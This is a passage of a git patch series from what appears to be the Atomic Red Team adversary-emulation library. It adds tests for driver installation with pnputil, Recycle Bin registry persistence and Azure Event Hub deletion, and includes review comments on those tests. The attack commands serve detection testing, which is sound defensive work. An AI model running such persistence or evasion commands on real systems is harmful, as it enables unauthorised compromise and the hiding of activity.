[BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Data from Configuration Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | -| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | +| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [File and Directory Discovery](../../T1083/T1083.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | 
Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fallback Channels [CONTRIBUTE 
A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) | | Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index cf4b2f95..70bdda60 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md 
@@ -11,7 +11,7 @@ | [External Remote Services](../../T1133/T1133.md) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Local Accounts](../../T1078.003/T1078.003.md) | [Malicious File](../../T1204.002/T1204.002.md) | [BITS 
Jobs](../../T1197/T1197.md) | [Authentication Package](../../T1547.002/T1547.002.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | [Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | -| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | +| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | [DCSync](../../T1003.006/T1003.006.md) | [Local Groups](../../T1069.001/T1069.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Replication Through Removable Media](../../T1091/T1091.md) | [Native API](../../T1106/T1106.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Replication Through Removable Media](../../T1091/T1091.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Spearphishing 
Attachment](../../T1566.001/T1566.001.md) | [PowerShell](../../T1059.001/T1059.001.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [Forced Authentication](../../T1187/T1187.md) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | 
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index c4eb414d..89645b81 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -11685,7 +11685,25 @@ privilege-escalation: - 'Kernel: Kernel Module Load' - 'Driver: Driver Load' - 'Process: OS API Execution' - atomic_tests: [] + identifier: T1547 + atomic_tests: + - name: Add a driver + auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785 + description: 'Install a driver via pnputil.exe lolbin + +' + supported_platforms: + - windows + input_arguments: + driver_inf: + description: A built-in, already installed windows driver inf + type: Path + default: C:\Windows\INF\usbstor.inf + executor: + command: 'pnputil.exe /add-driver "#{driver_inf}" + +' + name: command_prompt T1037: technique: id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334 @@ -42594,7 +42612,25 @@ persistence: - 'Kernel: Kernel Module Load' - 'Driver: Driver Load' - 'Process: OS API Execution' - atomic_tests: [] + identifier: T1547 + atomic_tests: + - name: Add a driver + auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785 + description: 'Install a driver via pnputil.exe lolbin + +' + supported_platforms: + - windows + input_arguments: + driver_inf: + description: A built-in, already installed windows driver inf + type: Path + default: C:\Windows\INF\usbstor.inf + executor: + command: 'pnputil.exe /add-driver "#{driver_inf}" + +' + name: command_prompt T1037: technique: id: attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334 diff --git a/atomics/T1547/T1547.md b/atomics/T1547/T1547.md new file mode 100644 index 00000000..d08968cd --- /dev/null +++ b/atomics/T1547/T1547.md @@ -0,0 +1,44 @@ +# T1547 - Boot or Logon Autostart Execution +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547) +
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. + +Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.
+ +## Atomic Tests + +- [Atomic Test #1 - Add a driver](#atomic-test-1---add-a-driver) + + +
+ +## Atomic Test #1 - Add a driver +Install a driver via pnputil.exe lolbin + +**Supported Platforms:** Windows + + +**auto_generated_guid:** cb01b3da-b0e7-4e24-bf6d-de5223526785 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| driver_inf | A built-in, already installed windows driver inf | Path | C:\Windows\INF\usbstor.inf| + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +pnputil.exe /add-driver "#{driver_inf}" +``` + + + + + + +
From d3a53714b4e169c5def9b5a63ea4be6267f2bd7a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 14 Mar 2022 18:41:04 +0100 Subject: [PATCH 34/83] Add persistance via Recycle bin (#1809) Co-authored-by: Carrie Roberts --- atomics/T1547.001/T1547.001.yaml | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml index 10db44a9..37687a1c 100644 --- a/atomics/T1547.001/T1547.001.yaml +++ b/atomics/T1547.001/T1547.001.yaml @@ -139,3 +139,14 @@ atomic_tests: cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore name: powershell elevation_required: true + +- name: Add persistance via Recycle bin + description: | + Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf) + User have to clic on the recycle bin to lauch the payload (here calc) + supported_platforms: + - windows + executor: + command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f + cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f + name: command_prompt From de94c41347daf3e5b17dcaa54839c0860b6d1919 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Mon, 14 Mar 2022 17:41:26 +0000 Subject: [PATCH 35/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1547.001/T1547.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml index 37687a1c..3c41bed1 100644 --- a/atomics/T1547.001/T1547.001.yaml +++ b/atomics/T1547.001/T1547.001.yaml 
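Review bot: The new test writes `HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command` but declares no `elevation_required`; on a default system that CLSID key lives under HKLM\Software\Classes, and a new subkey written through HKCR is stored there, so the `reg ADD` needs an administrative token (the sibling test in the context lines does declare `elevation_required: true`). Either add `elevation_required: true` under `executor`, or, if the intent is the unprivileged per-user variant of the technique, name the hive explicitly in both commands, `reg ADD "HKCU\Software\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f`, so the test is deterministic about what it touches and the cleanup removes what was created. The `cleanup_command` deletes the whole `shell\open` subtree with `/f`, which also removes a pre-existing `open` verb if one was there; a short comment stating that the test assumes the verb does not exist beforehand would make that explicit. The `name` and `description` carry typos (`persistance`, `clic`, `lauch`, `User have`) that the doc generator copies into the indexes and the test's heading and anchor, so fixing them here avoids regenerating those files later.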
@@ -141,6 +141,7 @@ atomic_tests: elevation_required: true - name: Add persistance via Recycle bin + auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f description: | Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf) User have to clic on the recycle bin to lauch the payload (here calc) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 00099f88..6c869322 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -899,3 +899,4 @@ e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 b2698b33-984c-4a1c-93bb-e4ba72a0babb cb01b3da-b0e7-4e24-bf6d-de5223526785 +bda6a3d6-7aa7-4e89-908b-306772e9662f From f3e3346b1aa07768ca0b68a6da9591a8dc73a1c5 Mon Sep 17 00:00:00 2001 From: Araveti Esanya Reddy Date: Mon, 14 Mar 2022 23:11:29 +0530 Subject: [PATCH 36/83] updated as per review comments --- atomics/T1562.001/T1562.001.yaml | 48 ------------------------------ atomics/T1562.008/T1562.008.yaml | 51 ++++++++++++++++++++++++++++++++ 2 files changed, 51 insertions(+), 48 deletions(-) diff --git a/atomics/T1562.001/T1562.001.yaml b/atomics/T1562.001/T1562.001.yaml index 947889a3..53edc348 100644 --- a/atomics/T1562.001/T1562.001.yaml +++ b/atomics/T1562.001/T1562.001.yaml 
@@ -574,51 +574,3 @@ atomic_tests: cmd /c #{DefenderControlExe} /E | Out-Null name: powershell elevation_required: true -- name: Azure-Defense-Evasion-Eventhub-Deletion - auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719 - description: | - Identifies an Event Hub deletion in Azure - supported_platforms: - - azure-ad - input_arguments: - username: - description: Azure username - type: String - default: null - password: - description: Azure password - type: String - default: null - event_hub_name: - description: Name of the eventhub - type: String - default: "test_eventhub" - resource_group: - description: Name of the resource group - type: String - default: null - name_space_name: - description: Name of the NameSpace - type: String - default: null - dependency_executor_name: powershell - dependencies: - - description: | - Install-Module -Name Az - prereq_command: | - try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - get_prereq_command: | - Install-Module -Name AzureAD -Force - executor: - command: | - $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force - $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd - Connect-AzureAD -Credential $creds - New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name} - cleanup_command: | - $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force - $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd - Connect-AzureAD -Credential $creds - Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name} - name: powershell - elevation_required: false diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index 2b76c7a9..5f70a039 100644 --- a/atomics/T1562.008/T1562.008.yaml 
+++ b/atomics/T1562.008/T1562.008.yaml 
@@ -39,3 +39,54 @@ atomic_tests: aws s3 rb s3://#{s3_bucket_name} --force name: sh elevation_required: false +- name: Azure - Eventhub Deletion + auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719 + description: | + Identifies an Event Hub deletion in Azure. + An Event Hub is an event processing service that ingests and processes large volumes of events and data. + An adversary may delete an Event Hub in an attempt to evade detection. + https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about. + supported_platforms: + - iaas:azure + input_arguments: + username: + description: Azure username + type: String + default: null + password: + description: Azure password + type: String + default: null + event_hub_name: + description: Name of the eventhub + type: String + default: "test_eventhub" + resource_group: + description: Name of the resource group + type: String + default: null + name_space_name: + description: Name of the NameSpace + type: String + default: null + dependency_executor_name: powershell + dependencies: + - description: | + Install-Module -Name Az + prereq_command: | + try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} + get_prereq_command: | + Install-Module -Name AzureAD -Force + executor: + command: | + $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force + $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd + Connect-AzureAD -Credential $creds + New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name} + cleanup_command: | + $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force + $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd + Connect-AzureAD -Credential $creds + Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name} + 
name: powershell + elevation_required: false From 3947bbc2a51e91ee359dd161756234e5cb09eafa Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 14 Mar 2022 17:41:32 +0000 Subject: [PATCH 37/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 ++ atomics/Indexes/Indexes-CSV/windows-index.csv | 2 ++ atomics/Indexes/Indexes-Markdown/index.md | 2 ++ .../Indexes/Indexes-Markdown/windows-index.md | 2 ++ atomics/Indexes/index.yaml | 26 ++++++++++++++ atomics/T1547.001/T1547.001.md | 35 +++++++++++++++++++ 6 files changed, 69 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e8436c52..385e6757 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -240,6 +240,7 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious v privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell +privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt 
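Review bot: The attack command does not perform the deletion the test is named for: `command` runs `New-AzEventHub`, which creates the hub, and the only `Remove-AzEventHub` call sits in `cleanup_command`, so a detection for Event Hub deletion would fire on cleanup rather than on the test itself. The executor also authenticates with `Connect-AzureAD`, which opens an AzureAD session but not the Az context that `New-AzEventHub`/`Remove-AzEventHub` use; `Connect-AzAccount -Credential $creds` is the matching cmdlet, and the prereq check should then look for the Az module the description installs rather than for AzureAD. I would create the hub in a dependency when it is missing, make the attack command the `Remove-AzEventHub` call, and drop the deletion from cleanup, roughly as below (indentation to be aligned with the surrounding list item).
```yaml
  dependencies:
  - description: |
      Install-Module -Name Az
    prereq_command: |
      try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
    get_prereq_command: |
      Install-Module -Name Az -Force
  - description: |
      Event Hub #{event_hub_name} must exist in namespace #{name_space_name}
    prereq_command: |
      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
      Connect-AzAccount -Credential $creds
      if (Get-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name} -ErrorAction SilentlyContinue) {exit 0} else {exit 1}
    get_prereq_command: |
      # … same credential setup and Connect-AzAccount as above …
      New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
  executor:
    command: |
      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
      Connect-AzAccount -Credential $creds
      Remove-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
    name: powershell
    elevation_required: false
```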
@@ -699,6 +700,7 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file r persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell +persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e18fe94d..d1c3e403 100644 --- 